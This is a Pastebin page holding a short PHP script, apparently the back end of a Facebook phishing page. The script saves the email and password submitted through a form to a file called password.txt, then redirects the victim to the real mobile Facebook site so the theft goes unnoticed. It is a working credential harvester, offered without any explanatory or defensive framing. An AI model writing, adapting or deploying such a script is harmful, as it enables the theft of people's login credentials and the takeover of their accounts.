Advertisement
chayanforyou

script.php

Mar 11th, 2017
224
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 0.22 KB | None | 0 0
  1. <?php $handle = fopen("password.txt", "a"); fwrite($handle,$_POST["email"].PHP_EOL); fwrite($handle,$_POST["pass"].PHP_EOL); fwrite($handle,"".PHP_EOL); fclose($handle); header("Location: https://m.facebook.com"); exit; ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement